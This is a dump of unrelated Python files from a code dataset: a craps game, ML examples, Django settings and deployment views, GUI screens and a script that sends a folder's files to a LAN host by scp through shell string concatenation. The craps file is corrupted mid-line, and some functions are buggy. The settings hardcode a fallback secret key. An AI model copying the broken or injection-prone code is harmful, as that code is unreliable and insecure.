setproctitle.setproctitle('test_transfer_bound_rev')\n # print('Transfer bound Rev')\n # print('Transfer bound Rev', file=res_trans_bound_log)\n # for e in [0.1, 0.3]:\n # # robust_bound\n # m1 = model_set[('N', e)]\n # for t in ['NP', 'T', 'TB']:\n # m2 = model_set[(t, e)]\n # losses, errors, vprates, invprates = evaluate_transfer_robust(robust_transfer_test_loader, m2, m1, e, None, res_trans_bound_log, 10)\n # print(t, 'N', e, losses, errors, vprates, invprates, file=res_trans_bound_log)\n # res_trans_bound_log.flush()\n\n","sub_path":"test/transfer_test.py","file_name":"transfer_test.py","file_ext":"py","file_size_in_byte":20050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"237860045","text":"\"\"\"\ncraps赌博游戏:\n玩家掷两个骰子,点数为1-6,\n如果第一次点数和为7或11,玩家胜\n 第一次点数和为2、3、12,玩家输\n如果为其他点数,记录第一次点数和,然后继续掷骰子\n 直至点数和等于第一次掷骰点数和,玩家胜\n 如果过胜之前掷出和为7,玩家输\n\"\"\"\nimport random\nimport math\ndef crapsrandom():\n x = math.floor(random.random() *10) + 1\n while x > 6:\n x = math.floor(random.random() *10) + 1\n return x\ndef carpsgame():\n a = crapsrandom()\n b = crapsrandom()\n first_sum = a + b\n if first_sum == 7 or first_sum == 11:\n print('你赢了!你掷出了%d和%d,合%d'%(a,b,first_sum))\n elif first_sum == 2 or first_sum == 3 or first_sum == 12:\n print('你输了> 1:\n x = crapsrandom()\n y = crapsrandom()\n if x + y == 7:\n print('你第%d次掷出了%d,%d,你输了!你第一次掷出的点数为:%d,%d,合%d'%(count,x,y,a,b,first_sum))\n break\n elif x + y ==first_sum:\n print('你第%d次掷出了%d,%d,你赢了!你第一次掷出的点数为:%d,%d,合%d'%(count,x,y,a,b,first_sum))\n break\n else:\n print('你第%d次掷出了%d,%d,未分胜负!你第一次掷出的点数为:%d,%d,合%d'%(count,x,y,a,b,first_sum))\n count +=1\n continue\nif __name__ == '__main__':\n carpsgame()\n\n","sub_path":"python100days/day002/crapsgame.py","file_name":"crapsgame.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"214518154","text":"import tensorflow as tf\nfrom tensorflow import placeholder\nfrom tensorflow.examples.tutorials.mnist import \\\n input_data\n\nfrom keras import backend as K\nfrom keras.layers import Dense\nfrom keras.objectives import categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\n\nimport sacred\n\n\nex = sacred.Experiment()\n\n\n@ex.config\ndef cfg():\n hidden_units = 512\n batch_size = 32\n nr_epochs = 100\n optimizer = 'sgd'\n learning_rate = 0.1\n log_dir = 'log/NN{}'.format(hidden_units)\n\n\n@ex.capture\ndef build_model(hidden_units):\n img = placeholder(tf.float32, shape=(None, 784))\n label = placeholder(tf.float32, shape=(None, 10))\n\n h = Dense(hidden_units, activation='relu')(img)\n preds = Dense(10, activation='softmax')(h)\n\n loss = tf.reduce_mean(\n categorical_crossentropy(label, preds))\n accuracy = tf.reduce_mean(\n categorical_accuracy(label, preds))\n\n return img, label, loss, accuracy\n\n\n@ex.capture\ndef set_up_optimizer(loss, optimizer, learning_rate):\n OptClass = {\n 'sgd': tf.train.GradientDescentOptimizer,\n 'adam': tf.train.AdamOptimizer}[optimizer]\n opt = OptClass(learning_rate=learning_rate)\n return opt.minimize(loss)\n\n\n@ex.automain\ndef main(batch_size, nr_epochs, log_dir, _run):\n sess = tf.Session()\n K.set_session(sess)\n\n mnist = input_data.read_data_sets('MNIST_data',\n one_hot=True)\n\n img, label, loss, acc = build_model()\n train_step = set_up_optimizer(loss)\n\n init_op = tf.global_variables_initializer()\n sess.run(init_op)\n\n summary_writer = tf.summary.FileWriter(log_dir)\n summary_writer.add_graph(tf.get_default_graph())\n\n for epoch in range(nr_epochs):\n batch = mnist.train.next_batch(batch_size)\n _, l, a = sess.run([train_step, loss, acc],\n feed_dict={label: batch[1],\n img: batch[0]})\n\n _run.log_scalar(\"train.cross_entropy\", l)\n _run.log_scalar(\"train.accuracy\", a, epoch)\n print(epoch, a, l)\n\n return sess.run(acc, feed_dict={\n img: mnist.test.images,\n label: mnist.test.labels})\n","sub_path":"papers/klaus_greff/kerasexample.py","file_name":"kerasexample.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"132618400","text":"# # data analysis and wrangling\nimport pandas as pd\n# import numpy as np\n# import random as rnd\n\n# visualization\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#matplotlib inline\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nclass Model(object):\n def __init__(self, combine):\n self.combine = combine\n train_df = combine[0]\n test_df = combine[1]\n self.X_train = train_df.drop(\"Survived\", axis=1)\n self.Y_train = train_df[\"Survived\"]\n self.X_test = test_df.drop(\"PassengerId\", axis=1).copy()\n\n def main(self):\n self.logistic_regression()\n self.svm()\n self.knn()\n self.gaussian_naive_bayes()\n self.perceptron()\n self.random_forest()\n\n def logistic_regression(self):\n print(\"logistic regression beginning\")\n\n logreg = LogisticRegression()\n logreg.fit(self.X_train, self.Y_train)\n Y_pred = logreg.predict(self.X_test)\n\n coeff_df = pd.DataFrame(self.combine[0].columns.delete(0))\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(logreg.coef_[0])\n # print(coeff_df.sort_values(by='Correlation', ascending=False))\n\n acc_log = round(logreg.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"logistic regression done with {acc_log}% accuracy\")\n return Y_pred\n\n def svm(self):\n print(\"support vector machines beginning\")\n svc = SVC()\n svc.fit(self.X_train, self.Y_train)\n Y_pred = svc.predict(self.X_test)\n acc_svc = round(svc.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"support vector machines done with {acc_svc}% accuracy\")\n return Y_pred\n\n def knn(self):\n print(\"knn beginning\")\n knn = KNeighborsClassifier(n_neighbors=3)\n knn.fit(self.X_train, self.Y_train)\n Y_pred = knn.predict(self.X_test)\n acc_knn = round(knn.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"knn with {acc_knn}% accuracy\")\n return Y_pred\n\n def gaussian_naive_bayes(self):\n print(\"gaussian naive bayes beginning\")\n gaussian = GaussianNB()\n gaussian.fit(self.X_train, self.Y_train)\n Y_pred = gaussian.predict(self.X_test)\n acc_gaussian = round(gaussian.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"gaussian naive bayes done with {acc_gaussian}% accuracy\")\n return Y_pred\n\n def perceptron(self):\n print(\"perceptron beginning\")\n perceptron = Perceptron()\n perceptron.fit(self.X_train, self.Y_train)\n Y_pred = perceptron.predict(self.X_test)\n acc_perceptron = round(perceptron.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"perceptron done with {acc_perceptron}% accuracy\")\n return Y_pred\n\n def random_forest(self):\n print(\"random forest beginning\")\n random_forest = RandomForestClassifier(n_estimators=100)\n random_forest.fit(self.X_train, self.Y_train)\n Y_pred = random_forest.predict(self.X_test)\n random_forest.score(self.X_train, self.Y_train)\n acc_random_forest = round(random_forest.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"random forest done with {acc_random_forest}% accuracy\")\n return Y_pred","sub_path":"titanic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"309466611","text":"from collections import deque\n\n\nclass Robot:\n black = 0\n white = 1\n left = 0\n right = 1\n\n def __init__(self):\n self.painting = dict()\n self.x, self.y = 0, 0\n self.changes = 0\n self.moves = 0\n self.directions = deque([(0, -1), (-1, 0), (0, 1), (1, 0)])\n\n def get_color(self):\n return self.painting.get((self.x, self.y), Robot.black)\n\n def move(self, turn):\n self.moves += 1\n if turn == self.left:\n self.directions.rotate(-1)\n else:\n self.directions.rotate(1)\n self.x += self.directions[0][0]\n self.y += self.directions[0][1]\n\n def paint(self, color):\n if (self.x, self.y) not in self.painting.keys() and color == self.white:\n self.changes += 1\n self.painting[(self.x, self.y)] = color\n\n def get_changes(self):\n return self.changes\n\n def get_text_picture(self):\n min_x = min((x[0] for x in self.painting.keys()))\n min_y = min((x[1] for x in self.painting.keys()))\n max_x = max((x[0] for x in self.painting.keys()))\n max_y = max((x[1] for x in self.painting.keys()))\n\n picture = [ [\" \" for x in range(0,max_x-min_x+1)] for y in range(0,max_y-min_y+1)]\n for coords, color in self.painting.items():\n\n if color == Robot.white:\n picture[coords[1]][coords[0]] = \"#\"\n\n return picture\n","sub_path":"day11/Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"201486798","text":"# -*- coding:UTF-8 -*-\r\n\r\n\"\"\"\r\n找到数组中第一个不重复出现的整数 python\r\n\"\"\"\r\n\r\nimport collections\r\n\r\n\r\n# 组中不重复的数只有一个,初始值为0,然后直接遍历数组,让每个值与初始值进行异或,得出的最终值就是要找的结果:\r\ndef findNoDupOnlyOne(data):\r\n single = 0\r\n for v in data:\r\n single = single ^ v\r\n return single\r\n\r\n\r\n# 数组中不重复的数大于一个,则可以遍历一次数组,使用一个map记录数与数出现的次数;接着,再遍历一次map,找出次数为1的数,即为我们要找的数:\r\n# 找到第一个不重复的数字 负数会出bug\r\ndef findNoDupMany(data):\r\n single = 0\r\n Map = {}\r\n for i in range(len(data)):\r\n if data[i] in Map:\r\n Map[data[i]] += 1\r\n else:\r\n Map[data[i]] = 1\r\n for key in Map:\r\n if Map[key] == 1:\r\n single = key\r\n break\r\n return single\r\n\r\n\r\n# 找到第一个不重复的数字 ordereddict\r\ndef findFirstNoDupMany(data):\r\n single = 0\r\n Map = collections.OrderedDict()\r\n for i in range(len(data)):\r\n if data[i] in Map:\r\n Map[data[i]] += 1\r\n else:\r\n Map[data[i]] = 1\r\n print(Map)\r\n for key in Map:\r\n if Map[key] == 1:\r\n single = key\r\n break\r\n return single\r\n\r\n\r\n# 找到第一个重复的数字\r\ndef findFirstDup(numbers, duplication):\r\n # write code here\r\n numbers_set = set()\r\n for i in numbers:\r\n if i not in numbers_set:\r\n numbers_set.add(i)\r\n else:\r\n duplication[0] = i\r\n return True\r\n return False\r\n\r\n\r\nlist = [2, 3, 3, 1, 0, 2, 5, 3]\r\n\r\n\r\ndef nodup(list):\r\n for ind, i in enumerate(list):\r\n tmp = list[ind + 1:]\r\n for ind_j, j in enumerate(tmp):\r\n if i == j:\r\n break\r\n if ind_j == len(tmp) - 1 and i != j:\r\n return i\r\n\r\n\r\n# print(nodup(list))\r\n\r\ndata = [-10, -1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]\r\nprint(findFirstNoDupMany(data))\r\n","sub_path":"Classic/NoDup.py","file_name":"NoDup.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"640164270","text":"from gtts import gTTS\nimport string\n\n\ndef punc_remover(s):\n new_s = \"\"\n for i in s:\n if i not in string.punctuation:\n new_s += i\n return new_s\n\n\ns = input(\"Write your word:\\n\")\ntts = gTTS(text=s, lang='en')\ntts.save(\"{0}.mp3\".format(punc_remover(s)))\n","sub_path":"console code maker/gTTS/en/gTTS en.py","file_name":"gTTS en.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"333127702","text":"# program to send files constantly to a server through the pi once a connection\n# has been established\nimport subprocess\nimport time, os, threading\n\ndef sendFile(files, seconds):\n toSend = files\n for i in toSend:\n path = i\n print(i)\n destination = 'wow@192.168.1.15:/home/wow/Desktop/Data'\n process = os.popen('scp ' + path + ' ' + destination)\n preprocessed = process.read()\n process.close()\n print('success')\n time.sleep(seconds)\n \ndef findFiles():\n path = '/home/pi/Desktop/DataDump/'\n files = []\n \n for r, d, f in os.walk(path):\n for file in f:\n files.append(os.path.join(r, file))\n \n #for f in files:\n #print(f)\n return files \n \ntoFind = findFiles()\nsendFile(toFind, 90)","sub_path":"MachineLearningScripts/FileSender.py","file_name":"FileSender.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135529983","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.screenmanager import SlideTransition\nfrom kivy.uix.label import Label\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.graphics import Color, Rectangle\n\nfrom StudentDetailsWidget import StudentDetailsWidget\nfrom ColorBoxLayout import ColorBoxLayout\n\nitemSpacing = 12\ncontentPadding = 12\n\nfrom functools import partial\nclass SubjectsScreen(Screen): \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # self.subjects = kwargs['subjects']\n self.data = []\n \n boxLayout = ColorBoxLayout(orientation='vertical', color=Color(162/255, 162/255, 165/255,1))\n \n #scroll view\n self.scrollView = ScrollView()\n self.contentView = BoxLayout(orientation='vertical', padding=contentPadding, spacing=itemSpacing, pos_hint={'top': 1})\n self.scrollView.add_widget(self.contentView)\n\n #navigation bar\n self.navigationBar = ColorBoxLayout(orientation='horizontal', size_hint_y=None, height=140) \n \n self.backButton = Button(size_hint=(None,1), width= 260, text='< Back', background_color=(0, 0, 0, 0))\n self.backButton.on_press = self.back\n \n self.navigationBar.add_widget(Label(text='Subjects', size_hint_x=None, width=380, font_size=70))\n self.navigationBar.add_widget(Widget())\n self.navigationBar.add_widget(self.backButton)\n\n boxLayout.add_widget(self.navigationBar)\n boxLayout.add_widget(self.scrollView)\n self.add_widget(boxLayout) \n \n self.studentDetailsWidget = StudentDetailsWidget(size_hint_y=None, height=200)\n boxLayout.add_widget(self.studentDetailsWidget) \n\n def set_data(self, data): \n self.data = data\n self.studentDetailsWidget.set_student_data(data['current']) \n self.update()\n\n def on_pre_enter(self, *args): \n self.update() \n\n def update(self):\n self.contentView.clear_widgets() \n buttonHeight = 200\n for i in range(len(self.data['modules'])):\n \n subjectButton = Button(background_normal='', color=(0.1,0.1,0.1,1), font_size=50)\n subjectButton.size_hint_y = None \n subjectButton.height = buttonHeight\n subjectButton.text = '{0} {1}'.format(self.data['modules'][i]['id'], self.data['modules'][i]['name'])\n subjectButton.on_press=partial(self.select_subject, i) \n self.contentView.add_widget(subjectButton)\n\n self.contentView.size_hint_y = None\n self.contentView.height = len(self.data['modules'])*(buttonHeight + itemSpacing) - itemSpacing + 2*contentPadding\n \n def back(self):\n self.parent.transition = SlideTransition(direction=\"right\")\n self.parent.current = 'LOGIN_SCREEN'\n\n def select_subject(self, index):\n self.parent.transition = SlideTransition(direction=\"left\")\n self.parent.current = 'PROFESSORS_SCREEN'\n self.parent.professorsScreen.select_subject(index) \n\n","sub_path":"SubjectsScreen.py","file_name":"SubjectsScreen.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"175695356","text":"from pathlib import Path\n\nfrom decouple import config as secret\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent.parent\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = secret(\n \"DAJNGO_SECRET_KEY\", default=\"2x$e%!k_u_0*gq0s4!_u(2(^lpy&gir0hg)q&5nurj0-sseuav\"\n)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = secret(\"DJANGO_DEBUG\", cast=bool, default=True)\n\nALLOWED_HOSTS = [\"bolsonaro-api.herokuapp.com\", \"127.0.0.1\"]\n\n\n# Application definition\n\nDEFAULT_APPS = [\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n]\n\nLOCAL_APPS = [\n \"quotes.apps.QuotesConfig\",\n \"actions.apps.ActionsConfig\",\n]\n\nTHIRD_PARTY_APPS = [\n \"taggit\",\n \"taggit_labels\",\n \"rest_framework\",\n \"corsheaders\",\n \"drf_recaptcha\",\n \"django_filters\",\n \"drf_yasg\",\n]\n\n\nINSTALLED_APPS = DEFAULT_APPS + LOCAL_APPS + THIRD_PARTY_APPS\n\n\nMIDDLEWARE = [\n \"corsheaders.middleware.CorsMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"bolsonaro_api.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [BASE_DIR / \"static\" / \"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\n\nWSGI_APPLICATION = \"bolsonaro_api.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": secret(\"DATABASE_ENGINE\", default=\"django.db.backends.sqlite3\"),\n \"PORT\": secret(\"DATABASE_PORT\", cast=int, default=5432),\n \"USER\": secret(\"DATABASE_USER\", default=\"user\"),\n \"NAME\": secret(\"DATABASE_NAME\", default=BASE_DIR / \"db.sqlite3\"),\n \"PASSWORD\": secret(\"DATABASE_PASSWORD\", default=\"password\"),\n \"HOST\": secret(\"DATABASE_HOST\", default=\"localhost\"),\n }\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"default\": {\n \"format\": \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n \"datefmt\": \"%d/%m/%Y %H:%M:%S\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n }\n },\n \"loggers\": {\"django\": {\"handlers\": [\"console\"]}},\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\nDATE_INPUT_FORMATS = [\"%d/%m/%Y\"]\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_ROOT = BASE_DIR / \"static\"\nSTATIC_URL = \"/static/\"\n\nEMAIL_HOST_USER = secret(\"EMAIL_HOST_USER\", default=\"\")\nEMAIL_BACKEND = \"sendgrid_backend.SendgridBackend\"\nSENDGRID_API_KEY = secret(\"SENDGRID_API_KEY\", default=\"\")\nSENDGRID_SANDBOX_MODE_IN_DEBUG = secret(\n \"SENDGRID_SANDBOX_MODE_IN_DEBUG\", cast=bool, default=True\n)\n\n\nLANGUAGE_CODE = \"pt-br\"\nCORS_ALLOW_ALL_ORIGINS = True\n\n\nREST_FRAMEWORK = {\n \"DATE_INPUT_FORMATS\": [\"%d/%m/%Y\"],\n \"TEST_REQUEST_DEFAULT_FORMAT\": \"json\",\n \"DEFAULT_THROTTLE_CLASSES\": [\"rest_framework.throttling.AnonRateThrottle\"],\n \"DEFAULT_THROTTLE_RATES\": {\"anon\": \"100000/day\"},\n \"DEFAULT_FILTER_BACKENDS\": (\"django_filters.rest_framework.DjangoFilterBackend\",),\n \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n \"PAGE_SIZE\": 10,\n}\nDRF_RECAPTCHA_SECRET_KEY = secret(\"RECAPTCHA_SECRET_KEY\", default=\"\")\n# https://developers.google.com/recaptcha/docs/faq#id-like-to-run-automated-tests-with-recaptcha.-what-should-i-do\n\nTWITTER_API_KEY = secret(\"TWITTER_API_KEY\", default=\"\")\nTWITTER_API_SECRET_KEY = secret(\"TWITTER_API_SECRET_KEY\", default=\"\")\nTWITTER_API_TOKEN = secret(\"TWITTER_API_TOKEN\", default=\"\")\nTWITTER_API_SECRET_TOKEN = secret(\"TWITTER_API_SECRET_TOKEN\", default=\"\")\n\nCELERY_BROKER_URL = secret(\"REDIS_URL\", default=\"redis://localhost:6379\")\nCELERY_RESULT_BACKEND = secret(\"REDIS_URL\", default=\"redis://localhost:6379\")\nCELERY_ACCEPT_CONTENT = [\"application/json\"]\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_TASK_SERIALIZER = \"json\"\n\nSWAGGER_SETTINGS = {\"USE_SESSION_AUTH\": False}\n","sub_path":"django/bolsonaro_api/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"490395889","text":"#!/usr/bin/env python\n#coding:utf-8\n#author: moore moorewqk@163.com\n\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\n\nfrom django.views.generic.base import View\nfrom braces.views import LoginRequiredMixin\n\n\nimport json\nfrom jadehare.settings import BASE_DIR\n\nfrom .api import ServiceDeployFlow, ServiceStatus_init, GenOpsID, GetRecord\nfrom tools.uilts import RecordLog\nfrom .models import ServiceDeploy\nfrom service.models import ServiceStatus\nfrom .forms import ServiceDeployForm\n\n\nclass ServiceDeployListView(LoginRequiredMixin,View):\n\n def get(self,request):\n temp_name = \"deploycm/deploycm-header.html\"\n agentdeploy_list = ServiceDeploy.objects.all()\n\n return render(request,'deploycm/agentdeploy_list.html',locals())\n\n\nclass TryDeployView(LoginRequiredMixin,View):\n\n def get(self,request,id):\n instance = ServiceDeploy.objects.get(id=id)\n opsid = GenOpsID (instance=instance)\n instance.opsid = opsid\n instance.save ()\n\n res = ServiceDeployFlow (instance=instance, request=request)\n if res:\n instance.deploy_status = 1\n instance.save ()\n status = 1\n msg = \"部署:{servicename}成功\".format (servicename=instance.service.name)\n # render浏览器\n result = {\n 'status': status,\n \"msgs\": msg,\n }\n return HttpResponse (json.dumps (result), content_type=\"application/json\")\n\n else:\n instance.deploy_status = 2\n instance.save ()\n status = 2\n msg = \"部署:{servicename}失败\".format (servicename=instance.service.name)\n # render浏览器\n result = {\n 'status': status,\n \"msgs\": msg,\n }\n return HttpResponse (json.dumps (result), content_type=\"application/json\")\n \n \n \n\n\nclass ServiceDeployAddView(LoginRequiredMixin,View):\n\n def get(self,request):\n temp_name = \"deploycm/deploycm-header.html\"\n display_control = 'none'\n agentdeploy_form = ServiceDeployForm()\n return render(request,'deploycm/agentdeploy_add.html',locals())\n\n def post(self,request):\n temp_name = \"deploycm/deploycm-header.html\"\n agentdeploy_form = ServiceDeployForm(request.POST)\n if agentdeploy_form.is_valid():\n #1.同步调用API执行部署流程,\n #2.把部署流程日志写入日志记录表\n deploy_env = agentdeploy_form.cleaned_data[\"deploy_env\"]\n service = agentdeploy_form.cleaned_data[\"service\"]\n # isService = ServiceStatus.objects.\n #isDeployObjList = ServiceDeploy.objects.filter(service_id=service).filter(deploy_env=deploy_env)\n isdepHosts = []\n isdeploy = ServiceStatus.objects.filter(service_name=service.name)\n # print(isdeploy)\n if isdeploy and len(isdeploy) > 0:\n for dep in isdeploy:\n if dep.host in [host.asset_ip for host in agentdeploy_form.cleaned_data[\"hostList\"]]:\n isdepHosts.append(dep.host)\n \n if len(isdepHosts) > 0:\n msg = \"软件/服务:{projectname}在{isdepHosts}主机上已存在,请勿重复部署\".format(projectname=service.name,isdepHosts=isdepHosts)\n status = 3\n results = {\n 'agentdeploy_form': agentdeploy_form,\n 'request': request,\n 'temp_name': temp_name,\n 'status': status,\n \"msgs\": json.dumps(msg,ensure_ascii=False)\n }\n return render(request, \"deploycm/agentdeploy_add.html\", results)\n else:\n instance = agentdeploy_form.save()\n ServiceStatus_init (instance=instance)\n opsid = GenOpsID (instance=instance)\n instance.opsid = opsid\n instance.save()\n res = ServiceDeployFlow (instance=instance, request=request)\n if res:\n instance.status = 1\n instance.save ()\n status = 1\n msg = \"部署:{servicename}成功\".format (servicename=instance.service.name)\n # render浏览器\n results = {\n 'agentdeploy_form': agentdeploy_form,\n 'request': request,\n 'temp_name': temp_name,\n 'status': status,\n \"msgs\": msg,\n }\n return render (request, \"deploycm/agentdeploy_add.html\", results)\n\n else:\n instance.status = 2\n instance.save ()\n status = 2\n msg = \"部署:{servicename}失败\".format (servicename=instance.service.name)\n # render浏览器\n results = {\n 'agentdeploy_form': agentdeploy_form,\n 'request': request,\n 'temp_name': temp_name,\n 'status': status,\n \"msgs\": msg,\n }\n return render (request, \"deploycm/agentdeploy_add.html\", results)\n else:\n \n status = 2\n msg = \"部署失败\"\n results = {\n 'agentdeploy_form': agentdeploy_form,\n 'request': request,\n 'temp_name': temp_name,\n 'status': status,\n \"msgs\": msg,\n }\n return render (request, \"deploycm/agentdeploy_add.html\", results)\n\n\nclass ServiceDeployEditView(LoginRequiredMixin,View):\n\n def get(self,request,id):\n temp_name = \"deploycm/deploycm-header.html\"\n obj = ServiceDeploy.objects.filter(id=id)\n if len(obj) == 1:\n obj = obj[0]\n else:\n obj = None\n\n agentdeploy_form = ServiceDeployForm(instance=obj)\n return render(request,'deploycm/agentdeploy_edit.html',locals())\n\n def post(self,request,id):\n temp_name = \"deploycm/deploycm-header.html\"\n obj = ServiceDeploy.objects.filter(id=id)\n if len(obj) == 1:\n obj = obj[0]\n else:\n obj = None\n\n agentdeploy_form = ServiceDeployForm(request.POST,instance=obj)\n if agentdeploy_form.is_valid():\n instance = agentdeploy_form.save()\n msg = \"编辑成功\"\n RecordLog.WLogRecord (opsid=instance.opsid, user=request.user, fname=\"deploycm\",\n status=\"faild\", message=msg)\n status = 1\n msgs = json.dumps(\"编辑成功\")\n return render(request,'deploycm/agentdeploy_edit.html',locals())\n else:\n status = 2\n msg = \"编辑失败\"\n RecordLog.WLogRecord (opsid=obj.opsid, user=request.user, fname=\"deploycm\",\n status=\"faild\", message=msg)\n msgs = json.dumps(\"编辑失败\")\n return render(request,'deploycm/agentdeploy_edit.html',locals())\n \n\nclass ServiceDeployDeleteView(LoginRequiredMixin,View):\n\n def get(self,request):\n agentdeploy_id = request.GET.get('id','')\n if agentdeploy_id:\n try:\n ServiceDeploy.objects.filter(id=agentdeploy_id).delete()\n status = 0\n msgs = \"删除成功\"\n return JsonResponse({\"status\":status,\"msgs\":msgs})\n except Exception as e:\n status = 1\n msgs = \"删除失败\"\n return JsonResponse({\"status\":status,\"msgs\":msgs})\n\nclass ServiceDeployLogDetailView(LoginRequiredMixin,View):\n\n def get(self,request,opsid):\n temp_name = \"deploycm/deploycm-header.html\"\n # msgs = GetRecord(opsid)\n msgs = RecordLog.RecordDisplay(opsid)\n results = {\n 'request': request,\n 'temp_name': temp_name,\n \"msgs\": msgs\n }\n return render(request,'deploycm/agentdeploylogdetail.html',results)\n\n\nclass ServiceDeployHostsView(LoginRequiredMixin,View):\n\n\tdef get(self,request,id):\n\t\ttemp_name = \"deploycm/deploycm-header.html\"\n\t\tservicedeploy = ServiceDeploy.objects.get(id=id)\n\t\thost_list = [ host.asset_ip for host in servicedeploy.hostList.all()]\n\t\tprint(\"hhhh\",host_list)\n\t\treturn HttpResponse(json.dumps(host_list),content_type=\"application/json\")","sub_path":"deploycm/servicedeploy.py","file_name":"servicedeploy.py","file_ext":"py","file_size_in_byte":8613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"623376051","text":"import tkinter as tk\nfrom tkinter import messagebox as tkMessageBox\nimport requests\n\nclass Page1View(tk.Frame):\n \"\"\" Page 1 \"\"\"\n\n def __init__(self, parent, submit_callback, delete_callback, update_callback, detail_callback):\n \"\"\" Initialize Page 1 \"\"\"\n tk.Frame.__init__(self, parent, width=1200, height=1200, padx=20)\n self._parent = parent\n self._submit_callback = submit_callback\n self._delete_callback = delete_callback\n self._update_callback = update_callback\n self._detail_callback = detail_callback\n self._create_widgets()\n\n def _create_widgets(self):\n \"\"\" Creates the widgets for Page 1 \"\"\"\n self._label = tk.Label(self, text=\"Movie\")\n self._label.grid(row=1, column=2, padx=50)\n\n 